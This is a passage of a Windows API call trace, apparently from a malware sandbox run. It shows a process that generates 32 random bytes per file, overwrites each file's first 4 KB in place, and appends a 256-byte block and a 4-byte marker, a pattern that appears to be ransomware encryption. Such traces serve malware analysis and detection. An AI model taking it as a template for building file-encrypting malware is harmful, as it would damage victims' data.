[0075.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.050] GetProcessHeap () returned 0x280000 [0075.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.051] GetProcessHeap () returned 0x280000 [0075.051] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.051] GetProcessHeap () returned 0x280000 [0075.052] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.052] GetProcessHeap () returned 0x280000 [0075.052] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.052] GetProcessHeap () returned 0x280000 [0075.053] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.053] GetProcessHeap () returned 0x280000 [0075.053] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.053] SetFilePointerEx (in: hFile=0x784, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.053] WriteFile (in: hFile=0x784, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.053] WriteFile (in: hFile=0x784, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.053] GetProcessHeap () returned 0x280000 [0075.053] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0075.053] GetProcessHeap () returned 0x280000 [0075.053] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.053] GetProcessHeap () returned 0x280000 [0075.053] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.053] CloseHandle (hObject=0x784) returned 1 [0075.055] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 11 [0075.055] SetFilePointerEx (in: hFile=0x788, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.055] ReadFile (in: hFile=0x788, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.055] SetFilePointerEx (in: hFile=0x788, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.055] GetProcessHeap () returned 0x280000 [0075.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.055] GetProcessHeap () returned 0x280000 [0075.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.055] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.055] GetProcessHeap () returned 0x280000 [0075.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0075.055] ReadFile (in: hFile=0x788, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.106] SetFilePointerEx (in: hFile=0x788, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.106] WriteFile (in: hFile=0x788, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.106] GetProcessHeap () returned 0x280000 [0075.106] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.106] GetProcessHeap () returned 0x280000 [0075.106] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.106] GetProcessHeap () returned 0x280000 [0075.107] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.107] GetProcessHeap () returned 0x280000 [0075.107] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.107] GetProcessHeap () returned 0x280000 [0075.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.108] GetProcessHeap () returned 0x280000 [0075.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.109] GetProcessHeap () returned 0x280000 [0075.109] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.109] GetProcessHeap () returned 0x280000 [0075.110] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.110] GetProcessHeap () returned 0x280000 [0075.110] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.110] GetProcessHeap () returned 0x280000 [0075.111] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.111] GetProcessHeap () returned 0x280000 [0075.111] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.111] GetProcessHeap () returned 0x280000 [0075.111] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.111] GetProcessHeap () returned 0x280000 [0075.111] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.111] GetProcessHeap () returned 0x280000 [0075.111] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.111] GetProcessHeap () returned 0x280000 [0075.111] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.111] GetProcessHeap () returned 0x280000 [0075.111] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.111] GetProcessHeap () returned 0x280000 [0075.111] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.111] GetProcessHeap () returned 0x280000 [0075.111] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.111] SetFilePointerEx (in: hFile=0x788, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.111] WriteFile (in: hFile=0x788, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.111] WriteFile (in: hFile=0x788, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.111] GetProcessHeap () returned 0x280000 [0075.112] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0075.112] GetProcessHeap () returned 0x280000 [0075.112] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.112] GetProcessHeap () returned 0x280000 [0075.112] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.112] CloseHandle (hObject=0x788) returned 1 [0075.114] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 12 [0075.114] SetFilePointerEx (in: hFile=0x77c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.114] ReadFile (in: hFile=0x77c, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.114] SetFilePointerEx (in: hFile=0x77c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.135] GetProcessHeap () returned 0x280000 [0075.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.135] GetProcessHeap () returned 0x280000 [0075.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.135] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.135] GetProcessHeap () returned 0x280000 [0075.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0075.135] ReadFile (in: hFile=0x77c, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.190] SetFilePointerEx (in: hFile=0x77c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.190] WriteFile (in: hFile=0x77c, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: 